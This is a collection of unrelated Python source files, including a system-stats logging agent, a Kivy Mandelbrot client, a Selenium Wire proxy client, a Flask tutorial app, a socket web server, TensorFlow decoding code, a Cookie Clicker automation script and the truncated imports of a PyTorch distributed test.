# # print(x.get_realtime_concurrent(code))
# for i in range(100000):
# _time = datetime.datetime.now()
# if QA_util_if_tradetime(_time): # 如果在交易时间
# #data = x.get_realtime(code)
# data = x.get_realtime_concurrent(code)
# data[0]['datetime'] = data[1]
# x.save_mongo(data[0])
# # print(code[0])
# #data = x.get_security_bars(code, '15min', 20)
# # if data is not None:
# print(len(data[0]))
# # print(data)
# print('Time {}'.format((datetime.datetime.now() - _time).total_seconds()))
# time.sleep(1)
# print('Connection Pool NOW LEFT {} Available IP'.format(x._queue.qsize()))
# print('Program Last Time {}'.format(
# (datetime.datetime.now() - _time1).total_seconds()))
# # print(threading.enumerate())
# #
|
pc-stats.py
|
import time
import psutil, socket
from datetime import datetime
import requests, sys
from threading import Thread
def parseCPU():
log = psutil.cpu_freq(percpu=False).current
return log
def parseTemp():
log = str(psutil.sensors_temperatures()).split("current=")[1].split(",")[0]
return '{} C'.format(log)
def parseMemory():
log = psutil.virtual_memory().percent
return '{}%'.format(log)
def parseSwap():
log = psutil.swap_memory().used
return '%s MB' % str(int(log)/1024*1024)
def parseProcessInfo():
processDict = psutil.Process().as_dict(attrs=['pid', 'name'])
return '{}[{}]'.format(processDict['name'], processDict['pid'])
if __name__ == "__main__":
flag = False
logs = []
url = "http://localhost:3000/logs" if not len(sys.argv) == 2 else sys.argv[1]
headers = {'Content-type': 'application/json'}
def sendLogs(flag):
while True:
time.sleep(5)
if len(logs) > 0:
received_logs = list(logs)
flag = True
logs.clear()
r = requests.post(url, json={"agent": "stanija", "logs": received_logs},
headers=headers)
if r.status_code == 200:
flag = False
Thread(target=sendLogs, args=(flag, ), daemon=True).start()
while True:
log = {}
stats = {}
stats['frequency'] = parseCPU()
stats['temperature'] = parseTemp()
stats['memory'] = parseMemory()
stats['swap'] = parseSwap()
log["message"] = stats
log["logged_time"] = datetime.now().strftime('%m/%d/%Y %H:%M:%S')
log["host"] = socket.gethostname()
log["process"] = parseProcessInfo()
logs.append(log)
time.sleep(3)
|
app.py
|
from kivy.app import App
from kivy.app import async_runTouchApp
from kivy.uix.layout import Layout
from kivy.uix.widget import Widget
from kivy.uix.gridlayout import GridLayout
from kivy.uix.button import Button
from kivy.uix.label import Label
from kivy.uix.progressbar import ProgressBar
from kivy.uix.textinput import TextInput
from kivy.uix.popup import Popup
from kivy.factory import Factory
from kivy.config import Config
from kivy.core.window import Window
from kivy.graphics import Color, Rectangle
from kivy.properties import (NumericProperty, ReferenceListProperty, ObjectProperty)
import requests
import time, threading
Window.size = (900, 900)
# API_ENDPOINT = "127.0.0.1:8180"
API_ENDPOINT = "mood.guigxs.com"
def inter_1d(pos, min, max):
return min + pos * (max - min)
class Pixel(Widget):
max_iter = NumericProperty()
def __init__(self, request_parms, position, size, **kwargs):
self.request_parms = request_parms
self.position = position
self.pixel_size = size
super(Pixel, self).__init__(**kwargs)
r = requests.get(f'http://{API_ENDPOINT}?complex_r={self.request_parms[0]}&complex_i={self.request_parms[1]}&iter={self.max_iter}')
self.color = abs(1-(r.json()["response"]/self.max_iter))
# Arranging Canvas
with self.canvas:
Color(self.color, 0, 0) # set the colour
# Setting the size and position of canvas
self.rect = Rectangle(pos = self.position, size=(self.pixel_size, self.pixel_size))
class Grid(Widget):
width = NumericProperty(800)
height = NumericProperty(800)
start_x = NumericProperty(-2)
end_x = NumericProperty(1)
start_y = NumericProperty(-1.5)
end_y = NumericProperty(1.5)
start_cols = NumericProperty(0)
cols = NumericProperty(800)
start_rows = NumericProperty(0)
rows = NumericProperty(800)
pixel_size = NumericProperty(100)
zoom = NumericProperty(1)
def __init__(self, **kwargs):
super(Grid, self).__init__(**kwargs)
self.build()
def build(self, monitor=False):
start = time.time()
with self.canvas:
layout = GridLayout(cols=self.cols, rows=self.rows)
for i in range(self.start_cols, self.cols, self.pixel_size):
for j in range(self.start_rows, self.rows, self.pixel_size):
real_values = (inter_1d(i/self.cols, self.start_x, self.end_x), inter_1d(j/self.rows, self.start_y, self.end_y))
graph_values = (i, j)
layout.add_widget(Pixel(real_values, graph_values, self.pixel_size))
if (monitor):
App.get_running_app().pop_up.update_value(i/(self.cols))
print(f"Widget ({self.width}, {self.height}) built in x : [{self.start_x}...{self.end_x}] y : [{self.start_y}...{self.end_y}] with pixel size = {self.pixel_size} in {round(time.time() - start, 2)}s")
def refresh(self):
self.build(monitor=True)
App.get_running_app().dismiss_popup()
class PopupBox(Popup):
pop_up_text = ObjectProperty()
loading_value = ObjectProperty()
def update_pop_up_text(self, p_message):
self.pop_up_text.text = p_message
def update_value(self, value):
self.loading_value.value = value*100
class MandelbrotApp(App):
zoom = NumericProperty(1)
def dismiss_popup(self):
self.pop_up.dismiss()
def show_popup(self):
self.pop_up = Factory.PopupBox()
self.pop_up.update_pop_up_text('Rebuilding the area, please wait...')
self.pop_up.open()
def add(self, val):
self.show_popup()
self.grid.pixel_size = int(self.grid.pixel_size * 2)
self.pixel_size.text = f"Pixel size: {self.grid.pixel_size}"
mythread = threading.Thread(target=self.grid.refresh)
mythread.start()
def sub(self, val):
self.show_popup()
self.grid.pixel_size = int(self.grid.pixel_size / 2)
self.pixel_size.text = f"Pixel size: {self.grid.pixel_size}"
mythread = threading.Thread(target=self.grid.refresh)
mythread.start()
def set_size(self, val):
self.show_popup()
self.grid.pixel_size = int(self.size_input.text)
self.pixel_size.text = f"Pixel size: {self.grid.pixel_size}"
mythread = threading.Thread(target=self.grid.refresh)
mythread.start()
def change_coord(self, val):
self.show_popup()
self.grid.start_x = float(self.x0_input.text)
self.grid.end_x = float(self.x1_input.text)
self.grid.start_y = float(self.y0_input.text)
self.grid.end_y = float(self.y1_input.text)
mythread = threading.Thread(target=self.grid.refresh)
mythread.start()
def fill_boxes(self):
self.x0_input.text = str(self.grid.start_x)
self.x1_input.text = str(self.grid.end_x)
self.y0_input.text = str(self.grid.start_y)
self.y1_input.text = str(self.grid.end_y)
def build(self):
parent = Widget()
self.grid = Grid()
self.pixel_size = Label(text=f"Pixel size: {self.grid.pixel_size}", pos= (100, 800),)
self.label = Label(text=f"To:", pos= (800, 500), font_size=40)
self.size_input = TextInput(hint_text='New size', multiline=False, pos=(600, 800), halign="center")
self.x0_input = TextInput(hint_text='x0', multiline=False, pos=(800, 400), font_size=40, halign="center")
self.x1_input = TextInput(hint_text='x1', multiline=False, pos=(800, 300), font_size=40, halign="center")
self.y0_input = TextInput(hint_text='y0', multiline=False, pos=(800, 200), font_size=40, halign="center")
self.y1_input = TextInput(hint_text='y1', multiline=False, pos=(800, 100), font_size=40, halign="center", line_height=10)
self.button_go = Button(text='GO', pos=(800, 0), on_press=self.change_coord, font_size=40)
parent.add_widget(self.grid)
parent.add_widget(Button(text="-", pos= (0, 800), on_press=self.sub, font_size=50))
parent.add_widget(self.pixel_size)
parent.add_widget(Button(text="+", pos=(200, 800), on_press=self.add, font_size=50))
parent.add_widget(self.size_input)
parent.add_widget(Button(text="GO", pos=(700, 800), on_press=self.set_size, font_size=40))
parent.add_widget(self.x0_input)
parent.add_widget(self.x1_input)
parent.add_widget(self.y0_input)
parent.add_widget(self.y1_input)
parent.add_widget(self.button_go)
parent.add_widget(self.label)
self.fill_boxes()
return parent
if __name__ == '__main__':
MandelbrotApp().run()
|
client.py
|
import http.client
import json
import logging
import threading
from urllib.parse import quote_plus
from .handler import ADMIN_PATH, CaptureRequestHandler, create_custom_capture_request_handler
from .server import ProxyHTTPServer
log = logging.getLogger(__name__)
class AdminClient:
"""Provides an API for sending commands to a remote proxy server."""
def __init__(self, proxy_mgr_addr=None, proxy_mgr_port=None):
# The address of the proxy manager if set
self._proxy_mgr_addr = proxy_mgr_addr
self._proxy_mgr_port = proxy_mgr_port
# Reference to a created proxy instance and its address/port
self._proxy = None
self._proxy_addr = None
self._proxy_port = None
self._capture_request_handler = None
def create_proxy(self, addr='127.0.0.1', port=0, proxy_config=None, options=None):
"""Creates a new proxy server and returns the address and port number that the
server was started on.
Args:
addr: The address the proxy server will listen on. Default 127.0.0.1.
port: The port the proxy server will listen on. Default 0 - which means
use the first available port.
proxy_config: The configuration for any upstream proxy server. Default
is None.
options: Additional options to configure the proxy.
Returns:
A tuple of the address and port number of the created proxy server.
"""
if self._proxy_mgr_addr is not None and self._proxy_mgr_port is not None:
# TODO: ask the proxy manager to create a proxy and return that
pass
if options is None:
options = {}
custom_response_handler = options.get('custom_response_handler')
if custom_response_handler is not None:
self._capture_request_handler = create_custom_capture_request_handler(custom_response_handler)
else:
self._capture_request_handler = CaptureRequestHandler
self._capture_request_handler.protocol_version = 'HTTP/1.1'
self._capture_request_handler.timeout = options.get('connection_timeout', 5)
self._proxy = ProxyHTTPServer((addr, port), self._capture_request_handler,
proxy_config=proxy_config, options=options)
t = threading.Thread(name='Selenium Wire Proxy Server', target=self._proxy.serve_forever)
t.daemon = not options.get('standalone')
t.start()
socketname = self._proxy.socket.getsockname()
self._proxy_addr = socketname[0]
self._proxy_port = socketname[1]
log.info('Created proxy listening on {}:{}'.format(self._proxy_addr, self._proxy_port))
return self._proxy_addr, self._proxy_port
def destroy_proxy(self):
"""Stops the proxy server and performs any clean up actions."""
log.info('Destroying proxy')
# If proxy manager set, we would ask it to do this
self._proxy.shutdown()
self._proxy.server_close() # Closes the server socket
def get_requests(self):
"""Returns the requests currently captured by the proxy server.
The data is returned as a list of dictionaries in the format:
[{
'id': 'request id',
'method': 'GET',
'path': 'http://www.example.com/some/path',
'headers': {
'Accept': '*/*',
'Host': 'www.example.com'
},
'response': {
'status_code': 200,
'reason': 'OK',
'headers': {
'Content-Type': 'text/plain',
'Content-Length': '15012'
}
}
}, ...]
Note that the value of the 'response' key may be None where no response
is associated with a given request.
Returns:
A list of request dictionaries.
"""
return self._make_request('GET', '/requests')
def get_last_request(self):
"""Returns the last request captured by the proxy server.
This is more efficient than running get_requests()[-1]
Returns:
The last request as a dictionary or None if no requests have been
made.
"""
return self._make_request('GET', '/last_request')
def clear_requests(self):
"""Clears any previously captured requests from the proxy server."""
self._make_request('DELETE', '/requests')
def find(self, path):
"""Find the first request that contains the specified path.
Requests are searched in chronological order.
Args:
path: The request path which can be any part of the request URL.
"""
return self._make_request('GET', '/find?path={}'.format(quote_plus(str(path))))
def get_request_body(self, request_id):
"""Returns the body of the request with the specified request_id.
Args:
request_id: The request identifier.
Returns:
The binary request body, or None if the request has no body.
"""
return self._make_request('GET', '/request_body?request_id={}'.format(request_id)) or None
def get_response_body(self, request_id):
"""Returns the body of the response associated with the request with the
specified request_id.
Args:
request_id: The request identifier.
Returns:
The binary response body, or None if the response has no body.
"""
return self._make_request('GET', '/response_body?request_id={}'.format(request_id)) or None
def set_header_overrides(self, headers):
"""Sets the header overrides.
Args:
headers: A dictionary of headers to be used as overrides. Where the value
of a header is set to None, this header will be filtered out.
"""
self._make_request('POST', '/header_overrides', data=headers)
def clear_header_overrides(self):
"""Clears any previously set header overrides."""
self._make_request('DELETE', '/header_overrides')
def get_header_overrides(self):
"""Gets any previously set header overrides"""
return self._make_request('GET', '/header_overrides')
def set_rewrite_rules(self, rewrite_rules):
"""Sets the rewrite rules.
Args:
rewrite_rules: A list of rewrite rules. Each rule is a sublist (or 2-tuple)
containing the pattern and replacement.
"""
self._make_request('POST', '/rewrite_rules', data=rewrite_rules)
def clear_rewrite_rules(self):
"""Clears any previously set rewrite rules."""
self._make_request('DELETE', '/rewrite_rules')
def get_rewrite_rules(self):
"""Gets any previously set rewrite rules"""
return self._make_request('GET', '/rewrite_rules')
def set_scopes(self, scopes):
"""Sets the scopes for the seleniumwire to log/modify request and response.
Args:
scopes: a regex string or list of regex string.
"""
self._make_request('POST', '/scopes', data=scopes)
def reset_scopes(self):
"""Reset scopes to let proxy capture all requests."""
self._make_request('DELETE', '/scopes')
def get_scopes(self):
"""Gets any previously set scopes"""
return self._make_request('GET', '/scopes')
def _make_request(self, command, path, data=None):
url = '{}{}'.format(ADMIN_PATH, path)
conn = http.client.HTTPConnection(self._proxy_addr, self._proxy_port)
args = {}
if data is not None:
args['body'] = json.dumps(data).encode('utf-8')
conn.request(command, url, **args)
try:
response = conn.getresponse()
if response.status != 200:
raise ProxyException('Proxy returned status code {} for {}'.format(response.status, url))
data = response.read()
try:
if response.getheader('Content-Type') == 'application/json':
data = json.loads(data.decode(encoding='utf-8'))
except (UnicodeDecodeError, ValueError):
pass
return data
except ProxyException:
raise
except Exception as e:
raise ProxyException('Unable to retrieve data from proxy: {}'.format(e))
finally:
try:
conn.close()
except ConnectionError:
pass
class ProxyException(Exception):
"""Raised when there is a problem communicating with the proxy server."""
|
trigger.py
|
import time
import json
import redis
import threading
import sys
sys.path.append('..')
from logger.Logger import Logger, LOG_LEVEL
class Trigger():
def __init__(self, main_thread_running, system_ready, name='Trigger',key=None, source=None, thresholds=None, trigger_active=None, frequency='once', actions=[], trigger_interval=1, group=None):
self.name = name
self.key = key.replace(" ", "_").lower() if key is not None else self.name.replace(" ", "_").lower()
self.thresholds = thresholds
self.source = source.lower() if source is not None else source
self.trigger_interval = trigger_interval
self.actions = actions
self.group = group
self.frequency = frequency if group is None else "many"
# Used to check if trigger already fired without reseting
self.trigger_active = trigger_active
self.previous_state = trigger_active.is_set()
#Main thread events
self.main_thread_running = main_thread_running
self.system_ready = system_ready
return
def init_trigger(self):
#Initialize the trigger here (i.e. set listeners or create cron jobs)
pass
def check(self):
#Main trigger check loop to do things like fetch messages or check time
if self.group is not None:
self.group.check_group()
return
def run(self):
t = threading.Thread(target=self.check, args=())
t.start()
return t
def trigger(self, value=None):
try:
if self.group is None:
# Trigger the actions of the trigger
for action in self.actions:
action.trigger(value)
else:
self.group.trigger()
except Exception as e:
Logger.log(LOG_LEVEL["error"], "Error triggering action {0} ".format(self.key), e)
pass
return
def evaluateThresholds(self, value):
thresholds_passed = False
for threshold in self.thresholds:
comparison = threshold.get("comparison", "eq")
if comparison == "eq":
if value == threshold["value"]:
thresholds_passed = True
else:
thresholds_passed = False
elif comparison == "ne":
if value != threshold["value"]:
thresholds_passed = True
else:
thresholds_passed = False
elif comparison == "gt":
if value > threshold["value"]:
thresholds_passed = True
else:
thresholds_passed = False
elif comparison == "gte":
if value >= threshold["value"]:
thresholds_passed = True
else:
thresholds_passed = False
elif comparison == "lt":
if value < threshold["value"]:
thresholds_passed = True
else:
thresholds_passed = False
elif comparison == "lte":
if value <= threshold["value"]:
thresholds_passed = True
else:
thresholds_passed = False
return thresholds_passed
def decodeEventData(self, message):
if isinstance(message, dict):
#print('Dict Found')
return message
elif isinstance(message.decode('utf-8'), str):
try:
temp = json.loads(message.decode('utf-8'))
#print('Json Found')
return temp
except:
#print('Json Error. Str Found')
return {'event':'Unknown', 'data':message}
else:
#print('Failed to detect type')
return {'event':'Unknown', 'data':message}
def shutdown(self):
#Put any closing functions here that should be called as MudPi shutsdown (i.e. close connections)
return
|
hello_run.py
|
import os
from flask import Flask, render_template, session, redirect, url_for
from flask_bootstrap import Bootstrap
from flask_moment import Moment
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
from flask_sqlalchemy import SQLAlchemy
from flask_mail import Mail, Message
from flask_script import Manager,Shell
from flask_migrate import Migrate, MigrateCommand
from threading import Thread
basedir = os.path.abspath(os.path.dirname(__file__))
app = Flask(__name__)
app.config['SECRET_KEY'] = 'hard to guess string'
app.config['SQLALCHEMY_DATABASE_URI'] =\
'sqlite:///' + os.path.join(basedir, 'data.sqlite')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['MAIL_SERVER'] = 'smtp.qq.com'
app.config['MAIL_PORT'] = 587
app.config['MAIL_USE_TLS'] = True
app.config['MAIL_USERNAME'] = os.environ.get('MAIL_USERNAME')
app.config['MAIL_PASSWORD'] = os.environ.get('MAIL_PASSWORD')
app.config['FLASKY_MAIL_SUBJECT_PREFIX'] = '[Flasky]'
#app.config['FLASKY_MAIL_SENDER'] = 'Flasky Admin <flasky@example.com>'
#app.config['FLASKY_MAIL_SENDER'] = 'Kevin' # 这样写会报如下错
#raise SMTPSenderRefused(code, resp, from_addr)
#smtplib.SMTPSenderRefused: (502, b'Invalid input from 120.36.45.8 to newxmesmtplogicsvrsza8.qq.com.', 'Kevin')
app.config['FLASKY_MAIL_SENDER'] = '1141526033@qq.com'
app.config['FLASKY_ADMIN'] = os.environ.get('FLASKY_ADMIN')
bootstrap = Bootstrap(app)
moment = Moment(app)
db = SQLAlchemy(app)
migrate = Migrate(app, db)
mail = Mail(app)
manager = Manager(app)
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
users = db.relationship('User', backref='role', lazy='dynamic')
def __repr__(self):
return '<Role %r>' % self.name
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), unique=True, index=True)
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
def __repr__(self):
return '<User %r>' % self.username
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
print(to)
print(subject)
print(template)
print(kwargs)
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
class NameForm(FlaskForm):
name = StringField('What is your name?', validators=[DataRequired()])
submit = SubmitField('Submit')
@app.shell_context_processor
def make_shell_context():
return dict(db=db, User=User, Role=Role)
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
@app.errorhandler(500)
def internal_server_error(e):
return render_template('500.html'), 500
@app.route('/', methods=['GET', 'POST'])
def index():
form = NameForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.name.data).first()
if user is None:
user = User(username=form.name.data)
db.session.add(user)
db.session.commit()
session['known'] = False
print(app.config)
if app.config['FLASKY_ADMIN']:
print('888888')
send_email(app.config['FLASKY_ADMIN'], 'New User',
'mail/new_user', user=user)
else:
session['known'] = True
session['name'] = form.name.data
return redirect(url_for('index'))
return render_template('index.html', form=form, name=session.get('name'),
known=session.get('known', False))
if __name__ == "__main__":
manager.run()
|
server.py
|
"""
Web Server
"""
import socket
import threading
from todo.config import HOST, PORT, BUFFER_SIZE
from todo.utils import Request, Response
from todo.controllers import routes
def process_connection(client):
"""处理客户端请求"""
# 接收请求报文数据
# 解决客户端发送数据长度等于 recv 接收的长度倍数时阻塞问题
# https://docs.python.org/zh-cn/3.7/library/socket.html#socket.socket.settimeout
client.settimeout(0)
request_bytes = b''
while True:
try:
chunk = client.recv(BUFFER_SIZE)
except BlockingIOError:
break
request_bytes += chunk
if len(chunk) < BUFFER_SIZE:
break
# 请求报文
request_message = request_bytes.decode('utf-8')
print(f'request_message: {request_message}')
# 解析请求报文,构造请求对象
request = Request(request_message)
# 根据请求对象构造响应报文
response_bytes = make_response(request)
# 返回响应
client.sendall(response_bytes)
# 关闭连接
client.close()
def make_response(request, headers=None):
"""构造响应报文"""
# 默认状态码为 200
status = 200
# 获取匹配当前请求路径的处理函数和函数所接收的请求方法
# request.path 等于 '/' 或 '/index' 时,routes.get(request.path) 将返回 (index, ['GET'])
route, methods = routes.get(request.path)
# 如果请求方法不被允许,返回 405 状态码
if request.method not in methods:
status = 405
data = 'Method Not Allowed'
else:
# 请求首页时 route 实际上就是我们在 controllers.py 中定义的 index 视图函数
data = route()
# 获取响应报文
response = Response(data, headers=headers, status=status)
response_bytes = bytes(response)
print(f'response_bytes: {response_bytes}')
return response_bytes
def main():
"""入口函数"""
with socket.socket() as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(5)
print(f'running on http://{HOST}:{PORT}')
while True:
client, address = s.accept()
print(f'client address: {address}')
# 创建新的线程来处理客户端连接
t = threading.Thread(target=process_connection, args=(client,))
t.start()
if __name__ == '__main__':
main()
|
strategies.py
|
import tensorflow as tf
import uuid
import numpy as np
import concurrent.futures
import asyncio
from threading import Thread
import os
from mincall.common import TOTAL_BASE_PAIRS
from keras import models
from mincall.external.tensorflow_serving.apis import predict_pb2
from mincall.external.tensorflow_serving.apis import prediction_service_pb2
from grpc.beta import implementations
class BeamSearchStrategy:
def beam_search(self, logits) -> concurrent.futures.Future:
raise NotImplemented
class BeamSearchSess(BeamSearchStrategy):
def __init__(self, sess: tf.Session, surrogate_base_pair, beam_width):
self.sess = sess
if surrogate_base_pair:
self.logits_ph = tf.placeholder(
tf.float32, shape=(1, None, 2 * TOTAL_BASE_PAIRS + 1)
)
else:
self.logits_ph = tf.placeholder(
tf.float32, shape=(1, None, TOTAL_BASE_PAIRS + 1)
)
self.seq_len_ph = tf.placeholder_with_default(
[tf.shape(self.logits_ph)[1]], shape=(1,)
) # TODO: Write this sanely
with tf.name_scope("logits_to_bases"):
if beam_width > 0:
self.predict = tf.nn.ctc_beam_search_decoder(
inputs=tf.transpose(self.logits_ph, [1, 0, 2]),
sequence_length=self.seq_len_ph,
merge_repeated=surrogate_base_pair,
top_paths=1,
beam_width=beam_width,
)
elif beam_width == 0:
self.predict = tf.nn.ctc_greedy_decoder(
inputs=tf.transpose(self.logits_ph, [1, 0, 2]),
sequence_length=self.seq_len_ph,
merge_repeated=surrogate_base_pair,
)
else:
raise ValueError(f"Beam width cannot be <0, got {beam_width}")
self.predict_values = self.predict[0][0].values
def beam_search(self, logits: np.ndarray, loop=None):
assert len(
logits.shape
) == 2, f"Logits should be rank 2, got shape {logits.shape}"
f = concurrent.futures.Future()
f.set_result(
self.sess.run(
self.predict_values,
feed_dict={
self.logits_ph: logits[np.newaxis, :, :],
}
)
)
return f
class BeamSearchQueue:
def __init__(
self, sess: tf.Session, coord: tf.train.Coordinator, surrogate_base_pair
):
self.sess = sess
self.coord = coord
self.futures = {}
self.tf_inq = tf.FIFOQueue(
capacity=10,
dtypes=[tf.string, tf.float32],
)
self.tf_outq = tf.FIFOQueue(
capacity=10,
dtypes=[tf.string, tf.int64],
)
self.inq_name = tf.placeholder(tf.string)
self.inq_logits = tf.placeholder(tf.float32)
self.inq_enqueue = self.tf_inq.enqueue([self.inq_name, self.inq_logits])
self.inq_close = self.tf_inq.close()
with tf.name_scope("logits_to_bases"):
name, logits = self.tf_inq.dequeue()
self.predict = tf.nn.ctc_beam_search_decoder(
inputs=tf.transpose(logits, [1, 0, 2]),
sequence_length=[tf.shape(logits)[1]],
merge_repeated=surrogate_base_pair,
top_paths=1,
beam_width=50
)
enq_op = self.tf_outq.enqueue([
name,
self.predict[0][0].values,
])
qr = tf.train.QueueRunner(self.tf_outq, [enq_op] * os.cpu_count())
tf.train.add_queue_runner(qr)
self.out_dequeue = self.tf_outq.dequeue()
self.t = Thread(target=self._start, daemon=True)
self.t.start()
def _start(self):
try:
while True:
name, ind = self.sess.run(self.out_dequeue,)
name = name.decode("ASCII")
f = self.futures[name]
f.set_result(ind)
del self.futures[name]
except tf.errors.OutOfRangeError:
# Means the underlying queue is closed and we can safely exit
return
except Exception as ex:
self.coord.request_stop(ex)
raise
async def beam_search(self, logits, loop=None):
f = concurrent.futures.Future()
name = uuid.uuid4().hex
self.futures[name] = f
self.sess.run(
self.inq_enqueue,
feed_dict={
self.inq_name: name,
self.inq_logits: logits[np.newaxis, :, :],
},
)
return await asyncio.wrap_future(f, loop=loop)
def stop(self):
self.sess.run(self.inq_close)
self.t.join(timeout=10)
if self.t.is_alive():
raise ValueError("Thread still alive")
class BeamSearchTFServing(BeamSearchStrategy):
def __init__(
self,
host="localhost",
port=9001,
name="default",
signature_name=tf.saved_model.signature_constants.
DEFAULT_SERVING_SIGNATURE_DEF_KEY
):
self.channel = implementations.insecure_channel(host, int(port))
print(dir(self.channel))
self.stub = prediction_service_pb2.beta_create_PredictionService_stub(
self.channel
)
# Send request
request = predict_pb2.PredictRequest()
request.model_spec.name = name
request.model_spec.signature_name = signature_name
self.req = request
def beam_search(self, logits):
assert len(
logits.shape
) == 2, f"Logits should be rank 2, got shape {logits.shape}"
f = concurrent.futures.Future()
request = predict_pb2.PredictRequest()
request.CopyFrom(self.req)
request.inputs['logits'].CopyFrom(
tf.make_tensor_proto(logits[np.newaxis, :, :]),
)
result = self.stub.Predict(request, 120.0) # 120 secs timeout
f.set_result(np.array(result.outputs['path'].int64_val))
return f
class Signal2LogitsSess:
def __init__(self, sess: tf.Session, model: models.Model):
self.sess = sess
with tf.name_scope("signal_to_logits"):
self.signal_batch = tf.placeholder(
tf.float32, shape=(None, None, 1), name="signal"
)
self.logits = model(
self.signal_batch
) # [batch size, max_time, channels]
def signal2logit_fn(self, signal: np.ndarray) -> concurrent.futures.Future:
assert len(
signal.shape
) == 1, f"Signal should be rank 1, shape: {signal.shape}"
f = concurrent.futures.Future()
logits = self.sess.run(
self.logits,
feed_dict={
self.signal_batch: signal[np.newaxis, :, np.newaxis],
}
)
logits = np.squeeze(logits, axis=0)
f.set_result(logits)
return f
class Signal2LogitQueue:
"""Never Been tested, use at your own risk!
"""
def __init__(
self,
sess: tf.Session,
coord: tf.train.Coordinator,
model,
max_batch_size: int = 10
):
self.sess = sess
self.coord = coord
self.futures = {}
self.tf_inq = tf.PaddingFIFOQueue(
capacity=10,
dtypes=[tf.string, tf.float32, tf.int32],
shapes=[[], [None, 1], []],
)
self.tf_outq = tf.FIFOQueue(
capacity=10,
dtypes=[tf.string, tf.int64, tf.int32],
)
self.inq_name = tf.placeholder(tf.string, shape=[])
self.inq_signal = tf.placeholder(tf.float32, shape=(None, 1))
self.inq_length = tf.placeholder(tf.int32, shape=[])
self.inq_enqueue = self.tf_inq.enqueue([
self.inq_name, self.inq_signal, self.inq_length
])
self.inq_close = self.tf_inq.close()
with tf.name_scope("signal2logits"):
name, signal, signal_len = self.tf_inq.dequeue_up_to(max_batch_size)
logits = model(signal)
enq_op = self.tf_outq.enqueue([name, logits, signal_len])
qr = tf.train.QueueRunner(self.tf_outq, [enq_op] * os.cpu_count())
tf.train.add_queue_runner(qr)
self.out_dequeue = self.tf_outq.dequeue()
self.t = Thread(target=self._start, daemon=True)
self.t.start()
def _start(self):
try:
while True:
for name, logits, signal_len in zip(
*self.sess.run(self.out_dequeue,)
):
name = name.decode("ASCII")
f = self.futures[name]
f.set_result(logits[:signal_len])
del self.futures[name]
except tf.errors.OutOfRangeError:
# Means the underlying queue is closed and we can safely exit
return
except Exception as ex:
self.coord.request_stop(ex)
raise
async def logits(self, signal: np.ndarray, loop=None):
f = concurrent.futures.Future()
name = uuid.uuid4().hex
self.futures[name] = f
self.sess.run(
self.inq_enqueue,
feed_dict={
self.inq_name: name,
self.inq_logits: logits[np.newaxis, :, :],
},
)
return await asyncio.wrap_future(f, loop=loop)
def stop(self):
self.sess.run(self.inq_close)
self.t.join(timeout=10)
if self.t.is_alive():
raise ValueError("Thread still alive")
|
cookie-clicker-advanced.py
|
from coockieClickerUtils import *
# import threading
# Navigate to the application home page.
driver.get('https://orteil.dashnet.org/cookieclicker/')
load()
# Wait 2 seconds for the page to finish loading.
time.sleep(2)
# Load a script to speed up clicking.
hackCoockie()
# Accept cookies and chose English as language.
driver.find_element(By.XPATH, '/html/body/div[1]/div/a[1]').click()
driver.find_element(By.XPATH, '//div[@id="langSelect-EN"]').click()
# Wait 2 seconds for the page to finish loading.
time.sleep(3)
bigCookie = driver.find_element(By.XPATH, '//button[@id="bigCookie"]')
cookieCounter = driver.find_element(By.XPATH, '//div[@id="cookies"]')
goldenCookie = driver.find_element(By.XPATH, '//div[@id="goldenCookie"]')
shimmers = driver.find_element(By.XPATH, '//div[@id="shimmers"]')
# upgradeStore = driver.find_element(By.XPATH, '//div[@id="upgrades"]')
def cookieCount():
text = cookieCounter.text
# print('text:', text)
return text
def buyUpgrades():
upgrades = list()
try:
for i in range(200):
upgrade = driver.find_element(By.XPATH, '//*[@id="upgrade{}"]'.format(i))
upgrades.append(upgrade)
except Exception as e:
pass
upgrades.reverse()
for upgrade in upgrades:
classes = upgrade.get_attribute("class")
if "enabled" in classes:
upgrade.click()
return
def buyBuildings():
for i in range(18, 0, -1):
product = driver.find_element(By.XPATH, '//div[@id="product{}"]'.format(i))
classes = product.get_attribute("class")
if "enabled" in classes:
product.click()
return
def everyMinut():
# while True:
for i in range(5):
time.sleep(120)
save()
buyUpgrades()
buyBuildings()
print(cookieCount())
minutThread = threading.Thread(target=everyMinut)
minutThread.start()
# for i in range(5000):
while minutThread.is_alive():
bigCookie.click()
minutThread.join()
save()
# while True:
# buyUpgrades()
# time.sleep(5)
# Close the browser window.
driver.quit()
|
test_c10d.py
|
import copy
import math
import operator
import os
import random
import signal
import sys
import tempfile
import threading
import time
import traceback
import unittest
from unittest import mock
from contextlib import contextmanager
from datetime import timedelta
from functools import reduce
from itertools import groupby, product
from sys import platform
import numpy
import torch
import torch.distributed as c10d
if not c10d.is_available():
print("c10d not available, skipping tests", file=sys.stderr)
sys.exit(0)
import torch.distributed as dist
import torch.distributed.algorithms.ddp_comm_hooks.default_hooks as default
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.multiprocessing as mp
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from torch import nn
from torch._six import string_classes
from torch.nn.parallel import DistributedDataParallel
from torch.utils.checkpoint import checkpoint
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
requires_gloo,
requires_nccl,
requires_nccl_version,
skip_if_lt_x_gpu,
get_timeout,
skip_if_rocm,
simple_sparse_reduce_tests,
skip_if_win32,
create_device,
with_nccl_blocking_wait,
)
from torch.testing._internal.common_utils import (
TestCase,
load_tests,
run_tests,
retry_on_connect_failures,
ADDRESS_IN_USE,
